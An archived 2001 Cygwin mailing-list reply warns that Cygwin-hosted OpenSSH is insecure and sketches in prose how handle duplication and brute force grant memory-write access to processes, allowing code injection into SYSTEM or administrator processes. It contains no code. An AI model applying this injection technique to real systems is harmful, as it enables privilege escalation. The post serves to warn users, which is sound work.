This is the mail archive of the
cygwin@cygwin.com
mailing list for the Cygwin project.
RE: The security of OpenSSH with cygwin.
- To: <joetesta at hushmail dot com>
- Subject: RE: The security of OpenSSH with cygwin.
- From: "Robert Collins" <robert dot collins at itdomain dot com dot au>
- Date: Tue, 22 May 2001 11:35:07 +1000
- Cc: <cygwin at cygwin dot com>
Joe,
Have you looked up the thread I referred you too? It explained the
issue. IN DETAIL.
> > Right. I cannot emphasize strongly enough that Cygwin is
> NOT A SECURE
> > ENVIRONMENT. Do NOT trust it with sensitive data. It is trivially
> > easy to hack.
> >
> > cgf
>
>
> My Windows programming days ended awhile ago, so pardon me if
> this is incorrect
> or doesn't make sense.
>
> Under Windows 9x and Millenium, there is no (respectable)
> security model,
....
Correct.
> Now this brings me to another question: what does this mean
> in Windows
> NT/2000? I have no experience with these operating systems,
> but here's
> what I dare to assume: the security model would disallow
> this inter-process
> mingling.
Please don't assume without at least reading the references you are
given. That wastes your time and ours.
No-one said _anything_ about the security model being the issue - they
said that
Cygwin AS IT IS IMPLEMENTED TODAY has KNOWN PROBLEMS resulting in
TRIVIAL HACKS.
Please read the thread I referred you to. It explains the particular
issue I mentioned. A thumbnail sketch is that 1) if you have access to
duplicate a handle from a process and
2) that process has a handle to itself with full rights (the default
behaviour)
3) a simple brute force attack will get you a handle to the process with
full rights, which lets you write into that process's memory space.
> Are there any other issues, proven or otherwise, that anyone
> is aware of?
I don't have a canonical list. Use the source Joe.
For your stated purpose, (ssh + cygwin), via the stated attack above if
I can run a custom , or via bash appropriate shellcode I can get memory
write access to any cygwin linked process. If that process happens to be
running as SYSTEM or an administrator access account, then injecting
custom code into that will pretty much open the door to anything.
Rob
--
Want to unsubscribe from this list?
Check out: http://cygwin.com/ml/#unsubscribe-simple